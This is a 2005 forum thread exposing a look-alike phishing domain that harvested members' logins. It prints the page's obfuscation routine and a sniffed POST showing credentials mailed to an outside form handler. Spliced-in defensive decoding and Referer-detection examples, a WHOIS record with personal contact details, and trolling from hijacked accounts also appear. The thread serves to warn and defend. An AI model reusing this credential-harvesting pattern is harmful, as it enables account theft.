Scammers trying to steal login ~BEWARE~
Airkat
18-11-2005 20:52:42
Got this random guy IMing me, sent me to a url, and it was freeLpod guide which might fool someone since L looks like I in a URL bar. be VERY careful people. I caught it cuz it asked me to log in and firefox always fills in my pass
[quote][23:46] lilfrumpyazn: Hello Are you there?
[23:48] AirKat o31: sup azn
[23:48] lilfrumpyazn: im from freeipodguide. i was wondring if you needed any refs
[23:49] lilfrumpyazn: my profile
http://forum.freeipodguide.com/profile.php?mode=viewprofile&u=189
[23:51] AirKat o31: lol ur funny
[23:51] AirKat o31: no one is going to fall for this now since im going to let everyone know
[23:52] lilfrumpyazn: Yeah, I'm a dude on my sisters account.
[23:52] AirKat o31: and?
[23:52] AirKat o31: ur trying to send me to a fake site so I log in and u get my pass
[23:52] AirKat o31: dumbass
[23:52] lilfrumpyazn: wanna cyber :-*
[23:52] lilfrumpyazn: lmao[/quote]
Be ALERT!
theysayjump
18-11-2005 21:16:11
Is that the link above that you are talking about?
Airkat
18-11-2005 21:18:22
no, I edited so no one would click it... here it is with an L instead of an I
*** DONT LOGIN ***
http://forum.freelpodguide.com/profile.php?mode=viewprofile&u=189
unless of course freeLpodguide.com is a mirror you guys have registered
Daggoth
18-11-2005 21:19:25
its a fake link... I just talked to him. He says its http://forum.freeipodguide.com/profile.php?mode=viewprofile&u=189 but it leads to http://forum.free[b]l[/b]podguide.com/profile.php?mode=viewprofile&u=189
agroman
18-11-2005 21:21:44
that is some pretty crafty javascript. some of the code is url encoded.
Airkat
18-11-2005 21:25:21
indeed it is. and no matter where you go on that domain it takes you to that login page. Clever lil bastards. Be careful
agroman
18-11-2005 21:26:33
that first urlencoded bit is this unencoded
[code]
<SCRIPT LANGUAGE="JavaScript"><!--
hp_ok=true;
function hp_d01(s){
  if (!hp_ok) return;
  var o="",ar=new Array(),os="",ic=0;
  for(i=0;i<s.length;i++) {
    c=s.charCodeAt(i);
    if(c<128)c=c^2;
    os+=String.fromCharCode(c);
    if(os.length>80){
      ar[ic++]=os;
      os=""
    }
  }
  o=ar.join("")+os;
  document.write(o)
}
//--></SCRIPT>
[/code]
which probably decodes the rest of that crap.
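Added example, not part of agroman's post and not code from the phishing page: a way to peel this kind of obfuscation statically and list where a decoded login form would send its fields, without letting the page run. It assumes the page calls hp_d01 on an unescape()'d string; every name except hp_d01 is hypothetical, and the sample form and its hosts are constructed placeholders.

```javascript
// Added example: static decoding only. Nothing is eval'd or written to a DOM.
// %XX decoder (what unescape() does for two-digit escapes), tolerant of stray '%'.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Same transform as hp_d01: XOR 2 on code units below 128, others untouched.
// XOR with a constant is its own inverse, so this also builds the sample below.
function xor2(s) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    out += String.fromCharCode(c < 128 ? c ^ 2 : c);
  }
  return out;
}

// Assumed layering: hp_d01(unescape("...")).
function decodeLayer(encoded) {
  return xor2(percentDecode(encoded));
}

// List each form's action URL and hidden fields from the decoded markup.
function formTargets(html) {
  const forms = [];
  const formRe = /<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)[^>]*>([\s\S]*?)<\/form>/gi;
  for (const m of html.matchAll(formRe)) {
    const hidden = {};
    for (const [tag] of m[2].matchAll(/<input\b[^>]*>/gi)) {
      if (!/\btype\s*=\s*["']?hidden/i.test(tag)) continue;
      const name = /\bname\s*=\s*["']?([^"'\s>]+)/i.exec(tag);
      const value = /\bvalue\s*=\s*["']?([^"'>]*)/i.exec(tag);
      if (name) hidden[name[1]] = value ? value[1] : "";
    }
    forms.push({ action: m[1], hidden });
  }
  return forms;
}

// Constructed sample (placeholder hosts), encoded the same way for the demo.
const SAMPLE_PLAIN =
  '<form method="post" action="http://mailer.example.invalid/cgi-bin/form">' +
  '<input name="username"><input type="password" name="password">' +
  '<input type="hidden" name="To" value="collector@example.invalid">' +
  '<input type="hidden" name="File" value="http://forum.example.invalid/index.php">' +
  "</form>";
const SAMPLE_ENCODED = encodeURIComponent(xor2(SAMPLE_PLAIN));
console.log(formTargets(decodeLayer(SAMPLE_ENCODED)));
```

The hidden fields are the part to read first: in a form like this they say where the submission is mailed and where the victim is bounced afterwards.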
Airkat
18-11-2005 21:27:37
they've made it confusing intentionally. Just so no one could see where it went to
agroman
18-11-2005 21:29:39
fired up the sniffer and grabbed the HTTP POST it does (using username=asdf and password=asdf) for interested parties.
[code]
POST /cgi-bin/MailForm.exe HTTP/1.1
Host: www.safelink.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://forum.freelpodguide.com/profile.php?mode=viewprofile&u=189
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

username=asdf&password=asdf&login=Log+in&File=http%3A%2F%2Fforum.freeipodguide.com%2Findex.php&From=Support%40FreeiPodGuide.com&SMTP=mail.safelink.net&Subject=Login&To=3356911%40mail.com

HTTP/1.x 302 Redirect
Content-Length: 163
Content-Type: text/html
Location: http://forum.freeipodguide.com/index.php
Server: Microsoft-IIS/6.0
Date: Sat, 19 Nov 2005 05:29:22 GMT
[/code]
agroman
18-11-2005 21:30:58
oh yeah, it looks like it's emailing the usernames and passwords to
3356911@mail.com
agroman
18-11-2005 21:31:47
[quote="Airkat"]they've made it confusing intentionally. Just so no one could see where it went to[/quote]
as you can see, there are ways around the lengths they went to cover their tracks. ;)
Airkat
18-11-2005 21:33:33
indeed there is. good work man. I couldn't be arsed to bother :-D
mr_black
18-11-2005 21:53:30
wow I got a AIM from this guy asking me if i needed refs told him not
@tm watch out guys this guy is after us high TR ppl too im sure I would
have caught it tho I have my sn+pass saved too so I am never logged out.
this is by far the most creative scam yet....I am actually impressed to be truthful.
here is our convo
[quote="AIM"]Session Start (superjuicy1:lilfrumpyazn) Fri Nov 18 21:43:33 2005
[21:43] lilfrumpyazn: Hello Are you there?
[21:43] superjuicy1: hey
[21:43] superjuicy1: who is this?
[21:44] lilfrumpyazn: from freeipod guide
[21:44] lilfrumpyazn: was wondering if you needed any refs
[21:44] superjuicy1: @tm
[21:44] superjuicy1: not really
[21:45] lilfrumpyazn: oh okay
Session Close (lilfrumpyazn) Fri Nov 18 22:18:13 2005
[/quote]
mr_black
18-11-2005 22:01:46
*UPDATE*
I decided to run a lil test and I just put random login crap it accepts anything.
And the more dangerous thing is it actually directs to FIPG so that makes it
that much worse cuz if some1 goes for this they wouldnt even know that their info just got jacked.
[b]THERE SHOULD REALLY BE A GLOBAL THREAD ABOUT THIS TO
WARN EVERY1 CUZ NOT EVERY1 READS THIS FORUM[/b]
Shroud
18-11-2005 22:03:23
just made a fake account, so if you're reading this, YOU WILL NOT KNOW WHICH ONE IT WAS!
LockNLoad027
18-11-2005 22:18:17
im gay!
ilanbg
18-11-2005 22:39:15
[quote="LockNLoad027"]im gay![/quote]
Jacked?
LockNLoad027
18-11-2005 22:43:38
no im just really homosexual
theysayjump
18-11-2005 23:30:04
I'm going to move this to the Trading Post as I think more people will see it. I'll leave a mirror here for a while so that people know it's been moved though.
Good work guys!
dcny6923
18-11-2005 23:51:12
Im pretty gay too. are you single LockNLoad027? :)
Airkat
18-11-2005 23:52:05
w00t, I got stickied
Shadow Link 721
18-11-2005 23:55:31
Airkat
18-11-2005 23:58:24
strange indeed...
dcny6923
19-11-2005 00:00:46
very strange indeed :)
tvitems
19-11-2005 00:07:47
probably the same assholes that flood every ebay email address with links like those saying "VERIFY YOUR ACCOUNT WITHIN 48 HOURS OR YOU WIL BE BANNED- EBAY SECURITY" or some fake ass shit like that. Paypal too. everyone watch out for shit like that. BEWAREEEEEEEEEEEEEEEE
jfandem
19-11-2005 00:11:41
I am quite homosexual as well :). This is very strange indeed.
theysayjump
19-11-2005 00:17:08
Enough of the thread-crapping this is serious.
jfandem
19-11-2005 00:17:56
but i think you're a cutie and i wanna kiss you
dcny6923
19-11-2005 00:20:04
theysayjump I want to make sweet sweet love to your grandma :)
theysayjump
19-11-2005 00:21:32
Temp-ban, goodbye.
dcny6923
19-11-2005 00:22:02
I would care if this was my account! :)
theysayjump
19-11-2005 00:26:19
OK, he has been IP banned. Clearly those 3 people dcny6923, jfandem and lock 'n' load had their accounts jacked so I'll change the passwords for them and e-mail them.
Twat.
Oh it was this guy btw
http://forum.freeipodguide.com/profile.php?mode=viewprofile&u=436
dcny6923
19-11-2005 00:35:16
Yeah ban that loser! :P It's more than one person who is doing this you know....
theysayjump
19-11-2005 01:09:29
I didn't get the passwords changed in time but the little rascals should be gone now.
Kids :roll:
tvitems
19-11-2005 01:22:47
hahaha more like dooshbags....
Admin
19-11-2005 01:30:52
the forum now detects if users are redirected to the index from the phishing site and warns them to change their password in big letters. hopefully they'll get the picture.
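Added example, not the forum's actual code and not part of the Admin's post: one way a check like the one described could be written. It assumes the browser still sends the phishing page as Referer on the request that follows the 302 in the capture above; the function names, the warning hook and the confusable table are hypothetical.

```javascript
// Added example, not the forum's code. The confusable table is a small
// illustrative subset; LEGIT_BASE is the real forum's domain from the thread.
const LEGIT_BASE = "freeipodguide.com";

// Collapse look-alike glyphs to one representative so l/I/1 compare equal.
function skeleton(host) {
  return host
    .toLowerCase()
    .replace(/rn/g, "m")
    .replace(/vv/g, "w")
    .replace(/[l1|]/g, "i")
    .replace(/0/g, "o");
}

// Last two labels; adequate for a .com domain (assumption, no public-suffix list).
function baseDomain(host) {
  return host.toLowerCase().split(".").slice(-2).join(".");
}

// Returns "none" | "same-site" | "lookalike" | "other".
function classifyReferer(referer) {
  let host;
  try {
    host = new URL(referer).hostname;
  } catch {
    return "none"; // header missing or unparseable
  }
  const base = baseDomain(host);
  if (base === LEGIT_BASE) return "same-site";
  if (skeleton(base) === skeleton(LEGIT_BASE)) return "lookalike";
  return "other";
}

// Hypothetical hook for the index page: show the change-your-password warning
// when the visitor arrived from a look-alike host.
function shouldWarn(headers) {
  return classifyReferer(headers.referer) === "lookalike";
}

// Constructed request headers for the demo.
const samples = [
  { referer: "http://forum.freelpodguide.com/profile.php?mode=viewprofile&u=189" },
  { referer: "http://forum.freeipodguide.com/index.php" },
  { referer: "http://forum.free1podguide.com/" },
  {},
];
console.log(samples.map((h) => [h.referer || "(none)", shouldWarn(h)]));
```

A missing Referer proves nothing either way, so a check like this only catches the visitors whose browsers send the header.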
shamash
19-11-2005 08:42:10
ROFL! He got my password. I wonder if he did anything with my account. Better change it :/
The best part was, I sent it in like 3 times, cause I was like "God damnit".
Airkat
19-11-2005 08:43:01
and change the password if u use it anywhere else
compuguru
19-11-2005 08:50:35
Lol, I put in some bogus info, and it did redirect to a page that says that you need to change your password immediately. Good work FIG!
BTW Don't you have to be registered with whois?
punjabGTRR34
19-11-2005 09:09:38
My firefox saves my pw. I don't even know my password. Just to be on the safe side, I changed my pw anyways :-D
Cash4Cookies
19-11-2005 09:24:05
Damn, I was fooled, I just rolled out of bed and saw it, so I was like ok, log in. Then there was some message and I came here and changed my password. This was the IM
VietGurl328: Hello Are you there?
VietGurl328: http://forum.freeipodguide.com/profile.php?mode=viewprofile&u=6314
VietGurl328: Hello Are you there?
Cash4Cookies05: fuck u bitch
Airkat
19-11-2005 09:33:01
no shame, it's a clever ruse
LockNLoad027
19-11-2005 11:58:43
Oh well, it was fun while it lasted.
ilanbg
19-11-2005 12:38:54
You'd think someone with something as ingenious as this would have used it to scam rather than spam. :roll:
Good job though FIG community. This entire dilemma was very impressive.
jfandem
19-11-2005 14:52:30
Damn, my acct got hacked into last night by the same person, vietgurl328 or whatever..........i clicked the link and it asked me to login, whoops :( anyway theysayjump THANKS so much for catching it for me and fixing it. Will this affect anything else? And i just noticed in this thread there was someone posting with my name :(
johnjimjones
19-11-2005 14:55:33
meh i'm just going to change my password anyways even though i'm on this site 24/7.
compuguru
21-11-2005 05:05:09
He's got a new AIM VietGurl32
skillet2003
21-11-2005 05:37:23
yea that person just aimed me, luckily i saw this thread topic posted yesterday so I was wary enough not to login, even though I clicked the link and I didn't put in my password and login I should be good right?
slinky_
21-11-2005 13:50:47
Clever fellows.
reeemiks
22-11-2005 13:23:36
Very clever fellows indeed.....
compuguru
22-11-2005 19:41:38
WHOIS Information is now available
[code]WHOIS information for freelpodguide.com:
[whois.melbourneit.com]
Domain Name.......... freelpodguide.com
Creation Date........ 2005-11-19
Registration Date.... 2005-11-19
Expiry Date.......... 2006-11-19
Organisation Name.... Graeme Norris
Organisation Address. 7 Oakhill Rd
Organisation Address.
Organisation Address. Mt Waverley
Organisation Address. 3149
Organisation Address. NY
Organisation Address. AUSTRALIA
Admin Name........... Graeme Norris
Admin Address........ 7 Oakhill Rd
Admin Address........
Admin Address........ Mt Waverley
Admin Address........ 3149
Admin Address........ NY
Admin Address........ AUSTRALIA
Admin Email.......... freeipodguide@ign.com
Admin Phone.......... +1.61416119769
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax.............
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
[/code]
LockNLoad027
25-11-2005 08:25:37
dfpntblldude is now a 2 time scammer. he tried to do a Ps3 Giftfieasta and he was like i wont go through the site. Finally i got it out of him that they put him on hold! He scammed a guy and didnt pay him his 30.00
dfpntblldude is his AIM.. dont know his user name though
Just watch out.. hes loose
StrictlyBallin24
25-11-2005 12:33:03
Ouch :(. This is why I ask people for their FIPG username and look it up myself. No link clicking involved :)
theysayjump
25-11-2005 13:21:11
[quote="LockNLoad027"]dfpntblldude is now a 2 time scammer. he tried to do a Ps3 Giftfieasta and he was like i wont go through the site. Finally i got it out of him that they put him on hold! He scammed a guy and didnt pay him his 30.00
dfpntblldude is his AIM.. dont know his user name though
Just watch out.. hes loose[/quote]
Unfortunately that AIM name doesn't match anyone's on the forum. If he refused to use the forum to trade then he is more than likely banned.
lkmwangi
25-11-2005 18:22:36
fucking hell, i knew it was only a matter of time before hackers started noticing the earning potential.